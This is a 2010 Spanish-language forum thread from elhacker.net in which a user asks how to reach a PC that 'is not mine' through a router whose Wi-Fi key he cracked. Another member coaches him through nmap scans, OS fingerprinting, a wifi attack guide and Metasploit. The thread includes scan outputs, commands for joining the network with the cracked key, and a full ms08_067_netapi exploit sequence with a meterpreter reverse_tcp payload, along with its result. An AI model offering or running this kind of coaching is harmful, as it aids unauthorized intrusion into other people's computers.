Foro de elhacker.net

Seguridad Informática => Wireless en Linux => Mensaje iniciado por: Aiouek en 16 Agosto 2010, 15:22 pm



Título: Como conectar 2 pc's atraves de router
Publicado por: Aiouek en 16 Agosto 2010, 15:22 pm
Hola, posteo por aqui ya que perdi la pass de mi anterior cuenta jeje...
Bueno estoy haciendo pruebas en casa y ya me consegui la key de mi router con el wifiway 1.0, pero despues de conectarme con un portatil (tengo el de sobremesa que es el que utilizo normalmente) y me puse a buscar por google sobre como acceder a un pc a traves de un router pero todo lo que vi era "en el caso de que sean ambos pc's tuyos", que eso se hacerlo...
Lo que no tengo ni idea es como hacerlo si "uno es mio y otro no" xD....

¿Algún manual o sitio donde pueda documentarme? Gracias ;)


Título: Re: Como conectar 2 pc's atraves de router
Publicado por: cpu2 en 16 Agosto 2010, 16:42 pm
Metasploit y nmap

Un saludo


Título: Re: Como conectar 2 pc's atraves de router
Publicado por: Aiouek en 16 Agosto 2010, 22:56 pm
Me bajé ambos y estoy buscando manuales.... he leido algún post del foro pero au me queda bastante, si me podeis poner algun link para ir mas rapido os lo agradeceria, saludos y gracias ;)


Título: Re: Como conectar 2 pc's atraves de router
Publicado por: cpu2 en 16 Agosto 2010, 23:35 pm
Buenas, te recomiendo lectura...

Nmap
http://nmap.org/man/es/index.html

Metasploit
Busca por google que hay muchos manuales, y lectura que metasploit es un mundo xD

Podrias empezar haciendo esto
Código:
nmap 192.168.1.1/24

Le dices a nmap, mapeas la puerta de enlace (router) y te diga los equipos que hay en la red, para ver los puertos y si le puedes meter un exploit (Hay tienes que usar el metasploit) vamos pero mejor lee el enlace que esa manera es cutre, pero pa empezar esta bien.

Un saludo



Título: Re: Como conectar 2 pc's atraves de router
Publicado por: Aiouek en 17 Agosto 2010, 13:25 pm
;)

Una cosa, estoy usando el nmap - zenmap gui ¿es este? porque no es en modo consola, es esta ventana:

http://img694.imageshack.us/img694/9783/foto1zs.png

(No pongo la foto que ocupa media pagina xD)

Y con lo que pusiste me salen muchisimos datos jeje tendre que mirarlos y tal, aunque el SO no aparece creo, que lo he mirado por encima..
La duda es esa, ¿el nmap es el que uso verdad?

Y una cosa mas cuando intento usar el meta (consola) o el que sea me sale esta linea:

Configuring multi-user permissions for first run... ¿que hago?


Gracias  :xD

PD: Vaya, mientras escribia esto me a salido la ventana del meta como habia visto en mil fotos, asique imagino que esta bien ya que sale lo del smf >...


Título: Re: Como conectar 2 pc's atraves de router
Publicado por: Aiouek en 18 Agosto 2010, 21:22 pm
Buenas, estoy un poco atascado... he estado (y estoy) mirando tutos del metasploit y tengo un par de dudas:

-¿Cual me conviene utilizar ahora, la version web, consola?
-Una vez tengo el mapeo completo en el nmap y localizo al amigo, digamos 192.168.1.99, no me devuelve apenas ningun dato, solo esto:
Código:
Nmap scan report for 192.168.1.99

Host is up (0.0020s latency).

All 1000 scanned ports on 192.168.1.99 are filtered

MAC Address: 00:11:2F:XX:XX:XX (Asustek Computer)

Too many fingerprints match this host to give specific OS details

Network Distance: 1 hop

TRACEROUTE

HOP RTT     ADDRESS

1   2.00 ms 192.168.1.99

-En 192.168.1.1 me dice:
Código:
Network Distance: 1 hop

Service Info: OS: Linux; Device: broadband router

TRACEROUTE

HOP RTT     ADDRESS

1   3.45 ms 192.168.1.1

¿El router usa linux?

-En 192.168.1.34 me da la mac, un warning, device type, Aggressive OS guesses y network distance. ¿El agressive OS guesses son los "puntos flacos del pc"?
Salen bastante datos, pero el OS no lo veo.

-En la opción "Hosts Details" aparecen 4 "pc's", uno soy yo el otro es el router y los demas los amigos. Pero hay una pantalla en concreto que sale "encendida" y las demas con un simbolo de interrogación, ¿que significa la pantalla iluminada?
Mire mi ip en cmd, y no coincide con la de la pantalla iluminada....

Gracias de antemano xDD  :silbar:



Título: Re: Como conectar 2 pc's atraves de router
Publicado por: cpu2 en 18 Agosto 2010, 23:04 pm
Te conviene usarlo en modo consola, en el nmap lo mismo

-En la opción "Hosts Details" aparecen 4 "pc's", uno soy yo el otro es el router y los demas los amigos. Pero hay una pantalla en concreto que sale "encendida" y las demas con un simbolo de interrogación, ¿que significa la pantalla iluminada?
Mire mi ip en cmd, y no coincide con la de la pantalla iluminada....
Nose de que pantallas ablas, usa el nmap desde el cmd, no te compliques la vida.


-Una vez tengo el mapeo completo en el nmap y localizo al amigo, digamos 192.168.1.99, no me devuelve apenas ningun dato, solo esto:
Código:
Nmap scan report for 192.168.1.99

Host is up (0.0020s latency).

All 1000 scanned ports on 192.168.1.99 are filtered

MAC Address: 00:11:2F:XX:XX:XX (Asustek Computer)

Too many fingerprints match this host to give specific OS details

Network Distance: 1 hop

TRACEROUTE

HOP RTT     ADDRESS

1   2.00 ms 192.168.1.99

-En 192.168.1.1 me dice:
Código:
Network Distance: 1 hop

Service Info: OS: Linux; Device: broadband router

TRACEROUTE

HOP RTT     ADDRESS

1   3.45 ms 192.168.1.1



¿Que opciones le pusiste al mapeo? tambien puede que no tenga ningun servicio corriendo y por eso no detecta nada, tendrias que cogerle el trafico de red y ver que puedes hacer, te dejo un manual muy bueno

http://foro.elhacker.net/hacking_avanzado/how_to_ataque_modelo_wifi-t262484.0.html


-En 192.168.1.34 me da la mac, un warning, device type, Aggressive OS guesses y network distance. ¿El agressive OS guesses son los "puntos flacos del pc"?
Salen bastante datos, pero el OS no lo veo.



Probaste esto
Código:
nmap 192.168.1.34/24 -O

Un saludo


Título: Re: Como conectar 2 pc's atraves de router
Publicado por: Aiouek en 19 Agosto 2010, 21:25 pm
¡¡Gracias por la guia!! Hay cosas que me llevaran un poco de tiempo pero eso esta perfecto  :D
Si probe con el modificador -O, pero me devulelve exactamente lo mismo, ¿es raro?

Saludos!

Pd: El problema esque ahora estaba pensando hacerlo en windows, pero la guia esta pa linux :P


Título: Re: Como conectar 2 pc's atraves de router
Publicado por: cpu2 en 19 Agosto 2010, 22:43 pm
Puedes usar Backtrack que para cosas asi fucniona bien, pero la verdad si le metes un linux de sistema base mucho mejor.


Si probe con el modificador -O, pero me devulelve exactamente lo mismo, ¿es raro?

Saludos!
Prueba todo eso desde backtrack, si te devuelve lo mismo pegalo aki.

Un saludo


Título: Re: Como conectar 2 pc's atraves de router
Publicado por: Aiouek en 19 Agosto 2010, 22:49 pm
Entonces voy a meterme a linux, me bajare todos los programas pa linux y cuando los tenga te pego el recorte del backtrack, saludos ;)


Título: Re: Como conectar 2 pc's a traves de router
Publicado por: Aiouek en 21 Agosto 2010, 18:38 pm
Buenas, lo del backtrack me lo descargare mas adelante desde otro sitio ya que donde estoy ahora la linea es lenta  y no quiero cogerle todo el ancho de banda.
Lo pase todo a linux, solo el nmap y el meta, y ya hare pruebas con mi equipo para divertirme un rato antes de hacer chorradas :P

Asique dentro de pocos dias abriré de nuevo este post, en una o 2 semanas, ¡gracias!

Por cierto, ¿el backtrack se puede instalar en ubuntu no? vamos que no es un programa estilo wifiway, que puede ejecutarse como un programa normal desde ubuntu....

¿Que tarjetas son las mejores para esto? Lei que son las atheros, ¿pero dentro de las atheros cual es la mas recomendable?

Saludos!


Título: Re: Como conectar 2 pc's atraves de router
Publicado por: cpu2 en 22 Agosto 2010, 01:53 am
Por cierto, ¿el backtrack se puede instalar en ubuntu no? vamos que no es un programa estilo wifiway, que puede ejecutarse como un programa normal desde ubuntu....
No, Backtrack no se puede instalar dentro de ubuntu porque es un sistema operativo como Wifiway, lo puedes poner de livedvd o sistema base, pero yo te recomiendo que te pongas ubuntu o la distribucion que kieras y le metas los programas que necesites.

¿Que tarjetas son las mejores para esto? Lei que son las atheros, ¿pero dentro de las atheros cual es la mas recomendable?
Yo habia pensado en esta
http://foro.elhacker.net/materiales_y_equipos/iquestque_piensan_de_este_equipo-t302244.0.html
pero nose si funcara bien, nadie respondio.

Un saludo


Título: Re: Como conectar 2 pc's atraves de router
Publicado por: Aiouek en 26 Agosto 2010, 20:10 pm
Buenas, aqui te pongo lo que me sale con root@Terminal:~# nmap 192.168.1.1/24 -O:
Código:
Starting Nmap 5.00 ( http://nmap.org ) at 2010-08-26 20:02 CEST
Interesting ports on 192.168.1.1:
Not shown: 996 closed ports
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
23/tcp open  telnet
80/tcp open  http
MAC Address: 64:68:0C:XX:XX:XX (Unknown)
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.15 - 2.6.26
Network Distance: 2 hop

All 1000 scanned ports on 192.168.1.33 are closed
MAC Address: 00:E0:98:XX:XX:XX (AboCom Systems)
Too many fingerprints match this host to give specific OS details
Network Distance: 2 hop

All 1000 scanned ports on 192.168.1.34 are closed
Too many fingerprints match this host to give specific OS details
Network Distance: 0 hops

OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 256 IP addresses (3 hosts up) scanned in 12.12 seconds
Y con nmap 192.168.1.1/24 "que los 1000 puertos escaneados estan cerrados"..

Estoy bajando el backtrack, en un rato subo los resultados. Saludos.



Título: Re: Como conectar 2 pc's atraves de router
Publicado por: pepewarez en 27 Agosto 2010, 06:30 am

buenas a todos

Los felicito a todos ,se aprende mucho leyendo lo que estan escribiendo ,el uno preguntando y el otro respondiendo .

Ahora hay algo que no me cuadra .
como pueden ver las PC que estan detras de un router con el NMAP , si la unica manera de ver las PC que forman parte de esa LAN escondidas detras del router es formando parte de la lan interna del router ,pero no desde afuera

Desde afuera solo veria la MAc del router y escaneo de puertos y etc pero no las PC que estan detras

La manera seria con DMZ , Virtual AP, NAT , desvio del DNS ,etc

??? Estoy equivocado acaso o no 

 


Título: Re: Como conectar 2 pc's atraves de router
Publicado por: Aiouek en 28 Agosto 2010, 13:46 pm
Buenas a todos, yo me saqué la pass del router, me conecto al router y apartir de ahi hago nmap porque uso el wifiway para ese primer paso que es un poco mas rapido  :P...

Bueno estoy en backtrack y he llegado a un punto donde estoy estancadisimo:
Ya en startx abro la konsola, y hago este procedimiento:
Código:
iwlist wlan0 scan (essid, mode master, enc on)
ifconfig wlan0 down
iwconfig wlan0 mode managed, porque no me soporta mode master [Error 8B2A creo recordar]
ifconfig wlan0 up
iwconfig wlan0 key s:key-en-ascii
iwconfig wlan0 essid ESSID
dhclient wlan0 (ya que no tengo instalado el dhcpcd y al no tener internet/es live-cd)

Al hacer el ultimo paso, dhclient, parece que hace una especie de ping mostrando los milisengudos y al +-decimo intento me saca un error diciendo que no recibe tal dato y ahi se para.
El error que veo es lo del mode ya que me indica master y yo al no poder poner el master pongo managed. He leido que si eso lo que me pasa es cosa del driver que no lo soporta, ¿entonces que puedo hacer?

Saludos ;)


Título: Re: Como conectar 2 pc's atraves de router
Publicado por: cpu2 en 28 Agosto 2010, 14:40 pm
Buenas, en el nmap como se ve tiene todo cerrado, como dice la guia usa el wireshark, para ver el trafico y aver que se cuece, y la otra seria refinar mas el mapeo, no te puedo ayudar más, porque no estoi en mi pc.

Buenas a todos, yo me saqué la pass del router, me conecto al router y apartir de ahi hago nmap porque uso el wifiway para ese primer paso que es un poco mas rapido  :P...

Bueno estoy en backtrack y he llegado a un punto donde estoy estancadisimo:
Ya en startx abro la konsola, y hago este procedimiento:
Código:
iwlist wlan0 scan (essid, mode master, enc on)
ifconfig wlan0 down
iwconfig wlan0 mode managed, porque no me soporta mode master [Error 8B2A creo recordar]
ifconfig wlan0 up
iwconfig wlan0 key s:key-en-ascii
iwconfig wlan0 essid ESSID
dhclient wlan0 (ya que no tengo instalado el dhcpcd y al no tener internet/es live-cd)

Al hacer el ultimo paso, dhclient, parece que hace una especie de ping mostrando los milisengudos y al +-decimo intento me saca un error diciendo que no recibe tal dato y ahi se para.
El error que veo es lo del mode ya que me indica master y yo al no poder poner el master pongo managed. He leido que si eso lo que me pasa es cosa del driver que no lo soporta, ¿entonces que puedo hacer?

Saludos ;)

Fijo que es por el driver, dime el chip que tiene tu tarjeta, si no lo sabes haz un
Código:
lspci
Abria que ver el driver que usa, aver que se puede hacer :-\
Código:
lsmod
para conectarte puedes usar wicd del menu para que te sea mas facil, para activarlo creo que era algo asi
Código:
/etc/init.d/wicd start

Un saludo


Título: Re: Como conectar 2 pc's atraves de router
Publicado por: Aiouek en 28 Agosto 2010, 15:07 pm
Buenas, ok probaré. Ahora lo estoy haciendo en un XP sp3 y no esta muy actualizado asique me imagino que en cuanto pueda hacerlo, necesito conectarme al router, saldrán mas cosillas xD
Código:
Lspci:
Host bridge: Intel Corporation Mobile 4 Series Chipset Memory Controller
Ethernet controller: Atheros Communications Inc. AR5001 Wireless Network

Airmon-ng:
Chipset: Atheros
Driver: ath5k - [phy0]

Saludos

PD: Esto me importa pero de momento estoy haciendo todo casero y puedo conectar dos pc sin problemas.


Título: Re: Como conectar 2 pc's atraves de router
Publicado por: Aiouek en 29 Agosto 2010, 03:40 am
Buenas, usando nmap contra un XP SP3, con firewall activado y eset nod32 4.2, me dice que estan filtrados los puertos en cuestion.
Hago trampas  :laugh: y desactivo un rato el firewall, mientras nessus hace el scaneo.
Me saca varias vulnerabilidades, una en concreto alta, pero a la hora de montar todo con el meta me tira esto :O

Código:
use windows/smb/ms08_067_netapi
set payload windows/meterpreter/reverse_tcp
set RHOST 192.168.1.34
set LHOST 192.168.1.33
set SMBPIPE srvsvc
set EXITFUNC thread
set target 45
exploit
Resultado:
  • Started reverse handler on 192.168.1.33:4444
  • [-] Exploit exception: The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
  • Exploit completed, but no session was created.

Y al usar como payload:
Código:
windows/vncinject/reverse_tcp
Me dice que expiró el tiempo [con el firewall activado] y el mismo error sin el firewall.

_________________________________________________________________________

PD: Tengo el scan hecho por nessus y para que no meta la pata con que exploit utilizar he creado una db, lo tengo todo apunto excepto lo mas importante y esque el nessus no me genera los .neb solo me genera .nessus, .nessus (v1) y html ¿Como hago para que me saque los necesarios .neb? ¿puedo pasar cualquiera de los tres formatos que me deja a .neb?...;)


Si a alguien se le ocurre algo estoy por aqui un rato ;)
Saludos